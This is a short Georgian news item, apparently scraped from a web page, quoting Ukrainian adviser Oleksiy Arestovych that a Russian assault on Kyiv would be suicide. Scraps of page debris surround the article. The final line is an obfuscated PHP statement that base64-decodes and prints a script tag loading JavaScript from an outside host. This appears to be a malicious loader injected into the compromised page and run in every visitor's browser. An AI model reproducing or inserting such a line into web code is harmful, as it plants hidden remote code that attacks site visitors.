celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტის ოფისის ხელმძღვანელის მრჩევლის ალექსეი არესტოვიჩის თქმით, რუსული არმიის შეტევა კიევზე თვითმკვლელობა იქნება და ისინი ამაზე არ წავლენ.
 
მისი თქმით, ახლა ოპერატიული ვითარება ასეთია: რუსეთის ჯარებმა გააცნობიერეს, რომ ხუთ ადგილას ერთდროულად თავდასხმა ძალიან რთული მოვლენაა. როგორც არესტოვიჩმა აღნიშნა, რუსეთის არმიის ძირითადი ნაწილები ახლა მარიუპოლთან იმყოფებიან, კიევთან ახლოს შენაერთები „პრაქტიკულად არაფერია დარჩენილი”.
 
„აქ [კიევთან] რომ ისვრიან, იმიტომ გვექნება ილუზია, რომ რუსული ჯარები აქ არიან. შემიძლია ვთქვა, რომ მათ არაფერი აქვთ კიევზე თავდასხმისთვის. რამდენი რეზერვიც არ უნდა გაფლანგონ, კიევზე თავდასხმა წმინდაწყლის თვითმკვლელობაა. ისინი ამაზე არ წავლენ!" - აღნიშნა არესტოვიჩმა.
833
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");